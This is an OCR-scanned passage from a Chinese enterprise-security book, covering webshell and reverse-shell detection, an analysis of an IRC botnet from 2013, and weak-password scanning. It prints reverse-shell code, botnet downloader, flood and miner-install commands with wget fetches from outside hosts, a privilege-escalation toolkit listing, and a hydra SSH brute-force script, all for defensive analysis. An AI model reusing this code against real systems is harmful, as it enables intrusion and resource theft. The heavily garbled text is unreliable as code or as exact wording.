策略 必须 不 断 地 登 加 来 封 堵 ， 往 往 疲于奔命 。 我 认为 像 杀 毒 软件 或 各 色 
IPSNDS 那 样 不 断 累 加 特征 码 的 方式 ， 在 互联 网 公司 安全 团队 有 限 的 人 
力 资 源 条 件 下 ， 去 做 这 么 一 件 需 长 年 累 月 投入 人 力 且 收效 未 必 很 好 的 事 
是 非常 不 可 取 的 。 


如 何 让 策略 足够 完备 呢 ， 我 认为 基于 系统 的 机 制 、CGI 和 协议 规范 


征 较为 靠 详 的 ， 比 我 们 不 断 用 新 规则 、 新 策略 去 为 之 前 的 策略 打 “ 衬 
本 ”来 罪 谱 的 多 。 因 为 一 切 攻 击 与 防守 所 需 的 基本 功能 与 基本 逻辑 基于 
ika 








从 图 8-31 可 以 看 到 无 论 什 么 入 侵 行为 ， 都 对 应 着 更 高 一 纬度 的 系统 
功能 和 能 力 文 持 。 在 我 们 的 主场 ， 为 什么 放 着 这 些 有 利 的 条 件 不 用 了 呢 。 
与 攻击 者 针尖 对 麦 芷 地 在 低 纬 上 度 对 抗 ， 犹 如 章 受 了 《三 体 》 中 的 “ 降 维 
攻击 ”， 是 不 明智 的 做 法 。 


在 制定 策略 前 ， 先 分 析 一 下 入 侵 场 景 中 如 “webshell EHAR EKAA 
度 都 有 哪些 事件 发 生 ， 如 图 8-29 所 示 。 
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. 


(Form-based 
File Upload in 


efwrite@libphp. 
HTML) 


so 


¢IN_OPEN@inot 

ify 

*move_uploade 
d_file@libphp. 
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图 8-29 ”webshell 上 传 在 各 纬度 事件 
3. 策 略 实 践 


梳理 清楚 了 “webshell 上 传 ”这 个 场景 在 各 纬度 的 技术 细节 ， 如 何 制 
定 不 易 绕 过 的 集 略 就 相对 容易 了 。 


网 络 层 ， 不 用 去 考虑 添加 N 个 规则 去 应 对 诸如 “XXeditor 上 传 漏 
洞 "”“XXCMS 上 传 漏洞 "， 要 知道 无 论 什 么 漏洞 和 哪 种 猥琐 的 攻击 ， 
是 要 符合 HTTP 协议 ， 那 从 高 纬度 的 HITP 协 议 入 手 , “检测 符合 
RFC1867 标 准 的 上 传 CGI 行 为 ”: 


ČIK 


content 


CGI 层 ， 无 论 什 么 CGI 漏洞 导致 的 上 传 ， 漏 洞 代 码 几 乎 都 用 有 fopen 
等 写 文 件 的 操作 ， 这 里 我 们 关注 fopen 等 写 CGI 文 件 的 API 事 件 即 可 ; 





系统 用 户 态 ， 通 过 检测 系统 层面 的 API 调 用 行为 ， 比 如 写 模 式 open 





CGI (BE) ， 来 发 现 webshell 上 传 几 乎 对 于 攻击 者 来 说 几乎 很 难 绕 过 
检测 了 ， 除 非 websvr 直 接 是 root 启 动 且 能 加 载 任意 代码 ; 








系统 内 核 态 ， 通 过 内 核 inotify 事 件 来 发 现 CGI 创 建行 为 ， 在 这 一 层 
我 们 甚至 不 担心 root 启 动 的 websvr 加 载 恶 意 代 码 带 来 的 可 能 的 逃逸 检 
测 ， 至 少 在 完成 后 续 的 攻击 之 前 的 可 疑 行 为 必定 被 发 现 : 


14:58:25] INFO(23813); Clnotify::CheckCgiPath, check path /data/web 


14358;26]INFO(23813> 3 |! 1 





总 结 之 后 ， 我 们 的 检测 系统 如 图 8-30 所 示 ， 有 了 立体 纵深 结构 。 


_ RFC1867 


Sandbox( 


Linux kernel 





图 8-30 ”高 维 防守 


ARST 


前 面 看 到 ， 通 向 供 攻 击 者 施展 的 漏洞 利用 或 攻击 渠道 能 做 的 事情 毕 


竟 有 限 ， 防 守 方 在 高 一 纬度 对 事件 的 观察 与 检测 让 攻击 方 很 难 逃 逸 。 但 
也 要 注意 一 点 ， 对 入 侵 \ 漏 洞 场景 的 细致 分 机 ， 以 及 入 侵 场 景 关键 环节 
的 提炼 也 是 集 略 制定 的 关键 ,否则 也 会 陷入 不 断 为 旧 策 略 打 补 丁 的 尴 粹 
境地 。 





要 解决 一 个 入 侵 场景 ， 在 制定 策略 之 前 做 好 足够 的 分 析 并 提炼 其 最 
核心 的 技术 点 ， 贴 近 此 特征 制定 策略 效果 就 非常 好 ， 且 不 易 和 被 绕 过 。 下 
面 选择 两 个 Linux 系 统 和 常见 的 木 瑟 场景 和 案例 来 说 明 。 


熟悉 恶意 代码 取证 的 同学 应 该 清楚 常见 的 反 连 木马 ， 人 核心 "代码 部 
分 一 般 是 这 样 的 ; 





connect(sockfd, (struct sockaddr *)&cliaddr, sizeof(struct sockaddr)); 
dup2(sockfd, 1); 

dup2(sockfd, 2); 

execve("/bin/sh","sh",envp); 





那 我 们 检测 十 分 简单 ， 通 常 一 个 bash 进 程 是 不 会 有 网 络 连 接 的 ， 所 
以 检测 策略 是 bash 的 STDIN STDOUT 绑 定 了 socket 则 为 森马， 如 图 8-31 
FAR 


木马 shell(bash\sh...) 
* STDIN\STDOUT & $ [5] 
到 SOCKET 





普通 bash\sh... 
。 无 网 络 连 接 





图 8-31 ”常规 Linux 反 连 shell 检 测 思 路 


但 有 一 些 老练 的 攻击 者 的 代码 则 不 会 那么 偷懒 ， 壁 如 mod_rootme 这 
个 木马 ， 为 了 复 用 Apache 的 监听 端口 以 及 获得 root 权 限 的 shell， 在 代码 
逻辑 上 做 了 很 多 精巧 的 变换 组 合 ， 使 得 检测 不 可 能 象 前 述 那 类 普通 木马 
一 样 方便 。TSRC 官 微 曾经 有 分 享 过 
Chttp://t.qq.com/p/t/330573116082464 ) 如 何 发 现 mod_rootme 这 类 极为 
隐蔽 的 后 门 ， 如 图 8-32 所 示 。 再 狐 猎 的 后 门 也 有 异 于 系统 正常 行为 的 地 
方 ， 根 据 异 常 行为 建立 策略 是 相 比 那 类 签名 特征 更 为 靠 谱 的 检测 手段 。 





HTTPD 





C) libnss_dns-2.4.so 
C libnss_files-2.4.so 






mod_rootme.so 


»>=24 root httpd te 
，~ 二 66 个 管道 


àsta 


* 伪 终端 


图 8-32 ”Mod rootme 检 测 思 路 


安全 设备 与 检测 系统 布置 在 合适 的 纬度 使 得 防守 处 于 非常 有 利 的 位 
置 ， 同 时 尽 可 能 的 提炼 入 侵 场 景 的 关键 环 市 ， 则 是 检测 思想 的 精 角 。 


我 认为 甲 方 安 全 团队 尽量 避免 做 看 似 大 而 全 ， 针 对 每 一 类 漏洞 和 黑 
客 攻 击 手法 制定 集 略 的 思路 。 而 要 针对 自身 业务 特点 ， 分 析 其 主要 风 
险 ， 针 对 性 的 制定 策略 。 将 有 限 的 资源 用 于 对 抗 清晰 的 风险 场景 ， 是 更 
为 可 取 且 有 效率 的 事 。 








8.7 ”数据 链 生 态 僵尸 网 络 





接 入 了 互联 网 的 业务 被 攻击 是 难免 的 ， 尽 早 检 调 ， 做 好 事件 调 源 分 
析 和 情报 共 吾 ， 及 时 控制 其 蔓延 危害 网 络 ， 亡 羊 补 牢 为 时 未 晚 。 特 别 是 
应 对 类 似 于 僵尸 网 络 这 类 攻击 非常 有 效 。 








8.7.1 僵尸 网 络 传播 


botnet 或 蠕虫， 一 个 重要 的 特征 就 是 自动 传播 能 力 ， 这 里 介绍 2 类 党 
见 的 传播 方式 。 





:漏洞 传播 一 一 为 了 快速 获取 大 量 被 控 僵 尸 肉 鸡 ， 攻 击 者 会 及 时 更 
新 攻击 模块 。 笔 者 有 一 个 经 验 ， 每 次 在 检测 到 有 新 一 波 攻击 手法 时 ， 去 
查 查 最 近 公开 的 漏洞 或 许 就 能 看 到 。 同 时 作为 僵尸 网 络 大 范围 的 攻击 行 
为 (甚至 是 漫 无 目的 的 ) ， 几 乎 可 以 预见 到 的 是 他 的 行为 和 攻击 方式 
100% 会 被 侦察 到 ， 所 以 他 们 不 会 使 用 最 新 0day。 用 1day 是 权衡 两 者 最 
经 济 的 方式 ， 并 且 偏 爱 能 直接 执行 命令 的 类 型 ， 壁 如 : struts2 RCE. 
JBoss DeploymentFileRepository WAR Deployment、CVE-2012- 














1823 (PHP-CGI RCE) 等 。 


- 目 动 化 攻击 工具 一 一 漏洞 利 有 ， 而 装 有 存在 漏洞 的 软件 的 服务 句 
不 铺 有 ， 但 人 的 弱点 总 是 避免 不 了 的 。 比 如 弱 口 令 问 题 ， 现 如 今 最 古老 


的 弱 口 令 猜 解 攻击 依然 存在 ，ssh\ftpNdpvtelnet 等 等 ， 加 之 tomcat 管 理 后 
台 等 各 种 口令 。 现 在 越 来 越 快 的 网 速 ， 越 来 越 强 的 硬件 性 能 使 之 效率 越 
来 越 高 。 


8.7.2 ”僵尸 网 络 架 构 





这 里 分 析 一 个 2013 年 内 捕获 的 僵尸 网 络 ， 其 功能 特点 非常 具有 代表 
性 。 以 下 是 其 各 功能 模块 分 析 。 


1. 下 载 者 


负责 接收 控制 者 指令 ， 下 载 更 新 功能 模块 。 如 下 所 未 : 


; HTTP/ 1. O\r\nConnection: Keep- Alive\r\nUser-Agent: 
EE ee image/jpeg, image/pjpeg, imag 
Acc aa I chen et: £ 1 E F Br < \n", buf+itl, buf) : 
Send (s sock, NOTICE %s eu e1lving file. \n , sender) : 
file=fopen(argyv[2], "wb" 
while(1) i 


=recv(sock2, bufm,4096,0)) <= 0) break: 


) bufm[i]=0; 
for (d=0:d<i:d++) if tec mp (bufmtd, “\rinirin”, 4)) 

for (dt=4:d<i:d++) fputc (bufa [d]. file); 
goto done ; 

1 

J 

done: 

Send(sock, “NOTICE %s :Saved as %s\n", sender, argv[2]): 





2. 传 播 中 继 站 


僵尸 网 络 制造 者 为 了 隐蔽 自己 也 避免 整个 botnet 被 捣毁， 不 可 能 将 
传播 源 集 中 到 一 个 地 方 ， 所 以 常常 在 肉鸡 上 建立 中 继 站 。 





在 这 个 案例 中 ， 它 会 搭建 一 个 简易 的 webserver 来 实现 。 


lf/birv' sh 
rm -rf ins_ht. sh* 
if [ | -f /tmp/. ICE-unix/-log/htdocs/httpd ]; then 
mkdir /tmp/. ICE-unix 
mkdir /tmp/. ICE—-unix/-log 
mkdir /tmp/. ICE-unix/-log/ht docs/ 


cd /tmp/. ICE-unix/—log/ht docs/ 
rm -rf darkhttpd* 
weet http://unixdlyfe. org/gitweb/darkhttpd/blob_plain/HEAD: /darkhttpd. c 
if [ ! -f /tmp/. ICE-unix/-log/htdocs/darkhttpd.c ]; then 
weet http:/ /iim cu. cc: 35489/darkhttpd.c 





3. 被 控 端 


作为 一 个 僵尸 倪 儒 最 主要 就 是 “听话 ”， 此 次 案例 它 采 用 的 是 irc 通 
道 。 这 里 攻击 者 预 设 了 2 个 域名 作为 Server 通 信 地 址 ， 而 域名 解析 到 的 IP 
是 可 随时 更 换 的 ，ircbot 随 机 连接 到 任 一 个 Server。 


bin/ httpd : at you want this to hide as 
// Channel to join 
// The key of the channel 
int nums Zz: // Must change this to equal number of servers down there 


char *se ] // List the servers in that format, always end in (void*)0 





(void*) 0 


此 ircbot 有 多 个 基础 功能 ， 如 DDoS、 执 行 命令 、 自 杀 、 更 换 
Server、 切 换 静 默 状态 (Disables all packeting) 等。 


门 char *sender, int argc, char **argv. 

if (mfork(sender) != 0) return; 

Xs : TSUNAMI <target> <secs> Special packeter that wont be blocked by most firew 

alls\n", sender) ; 3 

Send (soc 1 PAN <target> <port> < > = An advanced syn flooder that will kill most network 
drivers\n", sender); sleep 

Send (sock, “NOTICE P <targ < s > A udp flooder\n", sender); sleep( 

Send(sock, “NOTICE %s :UNKNO t <secs> Another non-spoof udp flooder\n", sender); sleep (2): 


Send(sock, “NOTICE %s :NICK <nick> Changes the nick of the client\n",sender); sleep (2) 


Send (sock, “NOTICE % erver> Change rvers\n", sender): sleep (2) 
Send (sock, “NOTICE E = Gets the current spoofin: » sender); sleep (2) 
Send (sock, “NOTICE %s ;SPO( < t> = Changes spoofing to a subnet\n“, sender): sleep (2) 


Send (sock, “NOTICE %s :DISABLE Disables all packeting from this client\n", sender) ; 
2); 
Send(sock, “NOTICE %s : na all packeting from this ent\n", sender) 


Send (sock, “NOTICE ‘ = : 

Send (sock, “NOTICE G h addr > = Do file f ey an it onto the 
hd\n", sender); sleep (2) 

Send(sock, “NOTICE %s :¥ 0 n”, sender); sleep(2): 

Send (sock, “NOTICE $ Kills t ti: , sender); sleep (2); 

Send (sock, “NOTICE LP t n”, sender) ; 


Send (sock, “NOTICE %s : IRC = Sends this command to the server\n", sender); sleep( 


Send (sock, “NOTICE :SH <command> Executes a commanc ,sender); sleep 
exit (0); 





4i RR ED Be 





Ircbot 都 是 那些 上 古老 的 功能 ， 下 面 这 些 常常 才 是 各 种 不 同 BotNet 特 
有 的 。 


漏洞 扫 插 攻击 


本 案例 中 是 PHP CGI 的 RCE (CVE-2012-1823) : 





vir:~/tl/aa/tmp # 1s 


ChangeLog Makefile TODO bm.h inst ipsort ipsort.sgml php.c pnscan.: 
version.c ws 
LICENSE README bm.c bm.o install-sh ipsort.1 php pnscan pnscan.c 


pnscan.sgml version.o 

vir:~/tl/aa/tmp # head php.c 

/* Apache Magica by Kingcope */ 

/* gcc apache-magika.c -o apache-magika -lssl */ 

/* This is a code execution bug in the combination of Apache and PHP. 

On Debian and Ubuntu the vulnerability is present in the default install 
vir:~/tl/aa/tmp # cat ws 


#!/bin/bash 
while [ 1 ]; do 
# ___A="echo $(( (($RANDOM<<15)|$RANDOM) % 255 + 0 )) 


___A="echo $(( $RANDOM % 255 + © )) 


___B=$((_ ((RANDOM<<15)|RANDOM) % 255 + © )) 
./pnscan -w"HEAD / HTTP/1.0\r\n\r\n" -r"Server: Apache" -t 1000 $__A.$__B. 
#echo $__A.$__B 

#sleep 20 

done 








MEPER AN eZ BS TH. SRT T 
钱 才 是 他 们 最 终 目 的 ， 所 以 我 们 也 在 此 Botnet 中 发 现 了 “挖掘 机 ”， 并 且 
丧 心 病 狂 的 黑客 同时 进行 2 种 网 络 匿名 货币 的 挖掘 : bitcoin 和 
primecoin， 充 分 榨 干 系统 性 能 。 


weet https://github. com thbaumbacly ptsninerarchive/master. zip -0 ptsminer.zip --no-check-certificate 
unzip ptsmi 

rm -rf ptsmi 

cd ptsminer-mast 

cp makefile. uni 

sed -i -e’ 5 ; \/. ICE-un ib/’ makefile. ny 
sed -i -e’ ) EFS) 7 \/, ICE-unix c er ” makefile. my 
make -f m rr 

cp ptsminer /tmp/. ICE-unix/-log/dlogd 

cd /tmp 

rm -rf ptsminer* 


: | grep -v grep | grep “dlogd Ooititrbponti ei | vc 


ICE-unix/-log/ 


wget https:// github. com/thbaumbach/primecoiry archive/master. zip -0 primecoin. zip --no-check-certificate 
unzip primecoin. zip 

rm -rf primecoin. zip 

cd primecoin* 


include)/’ makefile. ny 
£ makefile. my 
$(LDFLAGS)/’ makefile. my 


make -f makefile. my prineniner USE_ UPNP= 1 
cp primeminer /tmp/. ICE-unix/-log/wlogd 
cd /tmp 

rm -rf primeminer* 


ables -I INPUT -p tcp = j j ACCEPT 


[ Sips -x | grep -v grep | grep “v jooluser x _ vc -1) -eq 0 J; then 
cd aah IcE-unix/-log 





-DooliD=igsiabpababd 中 -poolport=1337 -genproclimit= 


此 案例 中 的 攻击 者 并 不 满足 于 Web 漏 洞 进来 获得 的 普通 权限 ， 还 通 
过 系统 漏洞 ， 以 及 社工 “信息 采集 ) 方式 获得 root 权 限 。 





系统 提 权 漏洞 工具 如 下 : 


total 483 

drwxr-xr-x root root 1672 Nov 2 

drwxr-xr-x root root T2 Jan 3 

—ILWKI-RI-X root root 6425 Nov 

<r —xT sr root root 45046 Nov 

—Ywer-xIr-x root root 21753 Nov 

—Ywxr-xXr-xX root root 25201 Nov 

—Ywer-xIr-x root root 3004 Nov 

“INRE EL £ root root 6472 Nov 20135 2. 

一 上 WCXL 一 XI 一 信 root root 6237 Nov 18 2013 2. 
—Ywxr-xIr-x root root 2598 Nov 2 2013 2 25s C 
=Y KTS root root 24584 Nov 18 2013 2.6.27. c* 
—YWwer-Rr-x root root 672 Nov 18 2013 2.6.28. cx 


—rwxer-xIr-x root root 2. zi v 2 2013 2. 6. 30. cx 
-YWXY-XY-X root root a DY § 20153 2.6. 36-rc8 RDS. cx 


—rwxr-xIr-x root root 
drwxr-xr-x root root 
drwxr-xr-x 22 root root 
—rwerwerws root root 
—Lwerwxr-x root root 
一 上 VCXT 一 XI 一 root root 
TWAL- eto root root 
SEWE- XEF root 
EIRT ELT root 
—rwxr-xr-x root 
et root 


2013 2. 6. 9. ck 

2013 f 

2013 

2013 a. shx 

2013 american-sign-language. cx 
2013 archer. c* 

2013 bug-mangle. cx 

2013 caps-to-root. cx 

2013 comp* 

2013 


2013 death-star. cx 


= 


Bs Ba | 


一 、 =| rv 
mon 
“4 Cn co 


jw 
A oo AAN 


on — 
Cy 





和 候 取 conf 用 于 密码 root 猜 解 如 下 : 


count=0 


blankLine=" “ 


echo “ [-] Cautam fisierele de configurare... 


find Fa -Name “*conf*. php“ >> PATHS 2> fdev/null 
TOTAL= grep -c . PATHS 


. Ca am obosit de atata cautat! “ 
echo ” [+] Cautam parolele in fisierele de configurare... 
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大 肆 传 播 ， 并 且 利 用 被 控 的 肉鸡 进行 2 种 网 络 货币 的 挖掘 ， 充 分 棕 取 网 
鸡 系 统 资源 。Botnet 架 构 如 图 8-33 所 示 。 


Botnet 架构 





更 多 受害 者 aS 8 F 
/ Ganges 黑客 








Bot 





图 8-33 ”BotNet 架 构 


8.7.3 ”应 对 僵尸 网 络 威胁 


图 8-34 是 2013 年 11 月 某 新 出 的 0day 导 致 的 蠕虫 (Botnet) 爆发 ， 图 
表示 同期 Botnet 攻 击 尝试 趋势 统计 。Botnet 从 建立 到 覆灭 是 有 其 生命 周 
期 的 ， 如 图 8-35 所 示 ， 如 果 发 现 得 早 是 可 以 及 时 修补 漏洞 ， 建 立 阻 断 策 
略 ， 避 和 免 其 危害 扩散 。 





日 常安 全 工作 中 通过 对 入 侵 检测 数据 的 分 析 ， 能 感知 到 僵尸 网 络 的 
演变 以 及 0dayldayNday 的 攻击 趋势 。 当 僵尸 网 络 在 其 初期 ， 尚 未 形成 
规模 之 时 ， 如 果 及 时 联合 业界 安全 联盟 加 以 打击 ， 必 将 其 扼杀 在 摇篮 。 
合作 形式 参见 图 8-36。 





通 钟 BAT 这 类 公司 目 有 业务 和 服务 器 的 规模 庞大 ， 作 为 一 个 目标 巨 
大 的 “靶场 ”又 是 一 个 分 布 式 的 大 “ 蜜 锻 "， 如 果 能 充分 挖掘 其 数据 潜力 ， 
定 能 帮助 业界 共同 提升 安全 水 平 。 





图 8-34 ” ”Botnet 攻击 尝试 统计 





规模 化 





图 8-35 “Botnet 生 命 周期 





图 8-36 ”合作 方式 


8.8 LABS 
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其 稳定 运行 。 但 后 来 通常 会 发现 安全 状况 并 没有 得 到 有 效 改善 ， 其 根本 
原因 就 是 没有 深耕 细作 ， 深 入 运营 。 














Lea Kite 





前 面 介绍 了 大 量 的 安全 产品 与 方案 ， 那 么 是 否 逐 一 部 普 就 能 解决 安 
全 问题 呢 ? 答案 是 人 否定 的 。 通 毅 每 个 安全 产品 和 系统 的 研发 都 有 其 既定 
的 应 对 的 安全 场景 ， 在 采购 部 署 之 前 ， 你 是 否 有 评估 过 我 们 的 企业 到 底 
面临 哪些 风险 ， 对 应 的 应 该 选择 什么 安全 产品 和 方案 ? 





2. 安 全 事件 的 闭环 运营 





每 年 企业 内 部 网 络 环境 总 会 出 现 很 多 的 安全 事件 ， 在 我 们 匆忙 应 
息 ， 焦 头 烂 额 的 解决 之 后 ， 没 有 多 久 同 类 事件 在 另 个 角落 可 能 又 会 发 
生 ， 于 是 手 安 全 工程 师 们 惑 变 身 为 一 个 个 救火 队员 。 俗 话说 “一 个 人 不 
能 在 同一 个 坑 里 摔 两 次 ”， 我 们 迫切 需要 通过 对 安全 事件 于 环 运营 ， 完 
善 每 次 发 现 的 短 板 。 


-> 


3. 可 量化 的 安全 能 


安全 工作 中 我 们 会 不 断 建设 各 种 安全 系统 ， 上 各 种 安全 解决 方案 ， 
但 是 很 可 能 还 是 不 能 解决 一 个 问题 ， 我 们 的 安全 能 力 到 底 能 打 多 少 分 ? 
在 下 一 波 黑 客 攻 击 、 新 漏洞 \ 蠕 虫 出 现 的 时 候 ， 我 们 能 阻 断 \ 发 现 多 少 事 
件 ? 现 有 的 安全 系统 足够 解决 全 部 的 问题 了 吗 ? 


POR MA 
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个 部 分 。 


9.1 概述 


汤 洞 是 指 缺 少 安全 措施 或 采用 的 安全 措施 有 缺陷 ， 可 能 会 被 攻击 者 
利用 ， 对 企业 的 信息 资产 的 安全 造成 损害 。 漏 调 扫 描 就 是 利用 扫描 器 发 
现 漏洞 的 过 程 。 








企业 的 安全 工程 师 在 业务 上 线 前 或 对 公司 所 有 资产 进行 周期 性 地 例 
行 扫描 ， 可 以 在 被 攻击 者 发 现 可 利用 的 漏洞 之 前 发 现 并 修复 ， 将 可 能 带 
来 的 损害 减少 到 最 低 ， 对 企业 信息 安全 来 说 有 积极 主动 、 防 患 于 未 然 的 
作用 。 外 部 黑客 渗透 前 需要 踩点 ， 在 得 知 域名 及 IP 等 有 限 的 信息 逐步 进 
行 尝试 、 还 需要 绕 过 ACL、IDS、WAF 等 防御 措施 。 企 业内 部 扫描 可 以 
直接 拿 到 所 有 服务 器 的 资产 列表 、 所 有 Web 的 域名 及 在 每 个 IDC 部 署 扫 
描 服 务 器 ， 所 以 内 部 扫描 更 加 方便 、 更 全 面 。 但 是 群众 的 智慧 是 无 穷 
的 ， 即 便 是 这 种 信息 不 对 称 的 情况 下 ， 外 部 的 黑客 或 白 帽 子 总 有 办 法 找 
到 漏洞 ， 所 以 各 大 互联 网 公司 纷纷 都 建立 了 自己 的 应 急 啊 应 中 心 《俗称 
SRC) ， 并 给 报 漏 洞 的 白 帽 子 发 丰厚 的 奖励 。 〈 注 : 当下 的 SRC 已 经 不 
只 奖励 漏洞 ， 同 时 还 奖励 举报 的 危害 线索 ) 可 以 说 内 部 扫描 可 以 及 现 
999% 以 上 的 漏洞 ， 剩 余 的 则 需要 建立 应 急 响 应 中 心 借助 广大 和 白 帽 子 的 力 
量 ( 众 测 ， 类 似 众 筹 的 一 种 形式 ) 一 起 消灭 掉 ， 比 如 接收 外 部 白 帽 子 提 
供 的 漏洞 和 威胁 情报 信息 并 进行 奖励 。 图 9-1 为 国内 某 知 名 SRC 的 某 白 
ET SLR AK A 
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图 9-1 ESRC% JØ) 





9.2 ”漏洞 扫描 的 种 类 


9.2.1 按 漏 洞 类 型 分 类 





按 扫描 的 漏洞 的 类 型 及 目标 不 同 ， 可 以 将 漏洞 扫描 分 为 以 下 几 种 : 
:ACL 扫描 

` 弱 口令 扫描 

系统 及 应 用 服务 漏洞 扫描 

`Web 漏 洞 扫 描 


1.ACL 扫 描 








ACL 扫 描 是 用 来 按 一 定 的 周期 监视 公司 服务 器 及 网 络 的 ACL 的 ， 比 








如 无 需 对 外 开放 的 问 口 或 卫 是 售 骏 露 在 了 公 网 中 。ACL 扫 描 喜 的 作用 如 
P: 


1) 安全 部 门 可 以 根据 扫描 报告 督促 网 络 管理 员 和 系统 管理 员 关 闭 
骏 露 在 公 网 中 的 高 危 服 务 ， 避 免 重 要 的 服务 因 放 在 公 网 中 被 入 侵 的 风 


gs 





2) 等 东 些 应 用 或 东 些 版 本 的 应 用 发 现 新 漏 调 时 ， 安 全 部 门 可 以 快 
速 从 数据 库 中 得 到 存在 漏洞 的 服务 及 版 本 ， 直 接 报到 业务 部 门 去 修复 。 





ACL 扫 描 的 周期 至 少 为 一 天 一 次 ， 对 于 不 同 规模 服务 器 的 企业 可 以 
及 用 以 下 的 方式 : 





1) 对 于 服务 器 数量 较 少 的 公司 ， 可 以 直接 用 nmap 扫 描 ， 并 将 扫描 
出 来 的 IP、 端 口 、 应 用 服务 名 、 应 用 版 本 、 时 间 等 信息 存放 到 数据 库 
中 。 


2) 对 于 服务 器 数量 很 多 的 公司 ， 可 以 用 Masscan 扫 描 出 所 有 的 端口 
信息 ， 然 后 再 用 nmap 去 识别 端口 的 协议 及 应 用 程序 版 本 信息 ， 可 以 根 
据 实际 情况 部 署 扫描 服务 器 的 数量 、 形 成 分 布 式 的 架构 ， 加 快 扫 描 速 
度 。 





2. 弱 口令 扫描 








管理 员 因 芷 急 大 意 或 安全 意识 狂 弱 给 网 络 设备 、 服 务 喜 或 应 用 使 用 
了 默认 的 和 简单 的 口令 ， 这 种 弱 口 令 的 设备 挂 在 公 网 上 后 很 快 就 被 黑客 
或 蠕虫 扫描 a 到 并 快速 渗透 。 常 见 的 扫描 絮 如 Nessus、x-scan、h-scan、 
Hydra 痢 具备 弱 口 令 扫 描 的 功能 ， 其 中 hydra 文 持 的 服务 列表 如 下 : 


asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get}http[s]- 


{get|post}-form http-proxy http-proxy-urlenum 


icq imap[sjirc Idap2[s]ldap3[-{cram|digest}md5][s]mssql mysql (v4) 


nntp oracle-listener oracle-sid pcanywhere 


pcnfs pop3[s]postgres rdp redis rexec rlogin rsh s7-300 sip smb 


smtp[s]smtp-enum snmp 


socks5 ssh sshkey svn teamspeak telnet[s]vmauthd vnc xmpp 





HE: 弱 口 令 是 高 危 漏 洞 ， 扫 描 到 后 需要 业务 部 门 第 一 时 间 修 复 。 


以 下 为 一 个 Python 调用 hydra 扫 描 SSH 弱 口令 的 脚本 ， 扫 描 结 束 后 会 
将 结果 写 到 一 个 文本 文件 中 : 





import os 

import re 

import glob 

import datetime 

# import subprocess 

import torndb 

from bs4 import BeautifulSoup 

# honeypot white db 

db_info = dict( 
hostname='127.0.0.1', 
database='honeypot', 
username='xXxxxx!', 
password='! Xxxxxx 


) 


# Nmap scan class 


class NmapScaner (object): 
def _ init__(self, ip_list, exclude_file): 
self.dir = '/datai1/ssh_scan' 
self.ip_list = "%s/%s" % (self.dir, ip_list) 
self.exclude_file = exclude_file 
self.report = "%s/report_%s.xml" % (self.dir, str(datetime.datetime.now())[ 
self.ssh_list = "%s/report_%s.ssh" % (self.dir, str(datetime.datetime.now(' 
self.cmd = '/usr/bin/nmap -iL %s --excludefile %s -p 22,8022 -oX %s -n --of 
self.ip_list, self.exclude_file, self.report 
) 
self.hosts = [] 
def start(self): 
print self.cmd 
os.system(self.cmd) 


# p = subprocess.Popen(self.cmd, shell=True) 
# p.wait() 
def result(self): 
print "report: ", self.report, type(self.report) 


pi = r'<address addr="(.+?)" addrtype=".*"></address>' 
ri = re.compile(p1) 

p2 = r'<port portid="(.+?)" protocol=".*">' 

r2 = re.compile(p2) 


soup = BeautifulSoup(open(self.report).read()) 
results = soup. find_all("host") 
for item in results: 
host = dict() 
host["ports"] = list() 
ret_ip = ri.findall(str(item.address) ) 
if ret_ip: 
ip = ret_ip[0] 
host["ip"] = ip 
for port in item.ports: 
ret_port = r2.findall(str(port) ) 
if ret_port: 
host["ports"].append(ret_port[0] ) 
self.hosts.append(host ) 
# print hosts 
f = open(self.ssh_list, "w") 
for item in self.hosts: 
ports = item.get('ports') 
ip = item.get('ip') 
if ip in CONST_HONEYPOT: 
continue 
for port in ports: 
f.write('%s:%s\n' % (ip, port)) 
return self.ssh_list 
# Crack ssh passwd 


class CrackSSH(object): 
def _ init (self, ssh_filename): 
self.ssh_file = ssh_filename 
self.dir = '/datai1/ssh_scan' 
self.diri = '/data1/ssh_scan/scan_ssh' 
self.hydra = '/usr/local/bin/hydra' 
def prepare(self): 
cmd = 'rm -f %S/x*' % self.dir1 
print cmd 
os.system(cmd) 
cmd = "/usr/bin/killall -9 hydra" 
os.system(cmd) 
# ret = subprocess.call(cmd, shell=True) 


# print ret 

os.environ = '/datai/ssh_scan' 

cmd = "cd %s;/usr/bin/split -1 2000 %s' % (self.dir1i, self.ssh_file) 
# print cmd 

# ret = subprocess.call(cmd, shell=True) 

# print ret 


os.system(cmd) 
os.environ = None 
def scan(self): 
search = r'%s/x*' % self.dir1 
# print search, type(search) 
iplist = glob.glob(search) 
# print iplist 
for ip in iplist: 


cmd = '%s -vV -L %S/UuSer.txt -P %S/password.txt -M %s ssh -o 
%S.log -t 4 -w 10 -e nsr >> %s.log &' % \ 
(self.hydra, self.dir, self.dir, ip, ip, self.ssh_file) 
# print cmd 
os.system(cmd) 
# Honeypot white list 


class Honeywhite(object): 
def _ init__(self): 
self.db = torndb.Connection( 
host=db_info.get('hostname'), database=db_info.get('database'), 
user=db_info.get('username'), password=db_info.get('password' ) 


self.whiteList = [] 
def result(self): 
sql = "select * from honeypotip" 
ret = self.db.query(sql) 
for item in ret: 
self .whiteList.append(item.get('ip').strip()) 
return self.whiteList 
# Main Function 


if name == ' | main_': 
# get honeypot white list 
honey_white = Honeywhite( ) 
CONST_HONEYPOT = honey_white.result() 
print "Honeypot white list\n", CONST_HONEYPOT 
start_time = datetime.datetime.now( ) 
ip_list_file = 'ip_list_test.txt' 
exclude_file = "exclude_file.txt" 
h_exclude_file = open(exclude_file, "w") 
for ip in CONST_HONEYPOT: 
h_exclude_file.write("%s\n" % ip) 
h_exclude_file.close() 
nmap_scanner = NmapScaner(ip_list_file, exclude_file) 
nmap_scanner.start() 
ssh_file = nmap_scanner.result() 
end_time = datetime.datetime.now( ) 
use_time = (end_time - start_time).seconds / 60.0 
print "Start Time:%s, End Time:%s, Cost %s minutes" % (start_time, end_time, use 
# start to crack ssh weak password 
crack_ssh = CrackSSH(ssh_file) 
crack_ssh.prepare() 
crack_ssh.scan() 











3. 系 统 及 应 用 服务 漏洞 扫描 





常见 的 系统 及 应 用 服务 漏洞 扫 接 器 有 Nessus 及 开源 的 openVAS， 当 
服务 器 数量 巨大 时 ， 需 要 部 署 多 台 Nessus 服 务 器 以 集群 模式 进行 扫描 。 


实践 方法 如 下 : 


1) 用 程序 调用 Nessus 的 接口 ， 将 Nessus 的 漏洞 扫描 做 成 周期 性 任 
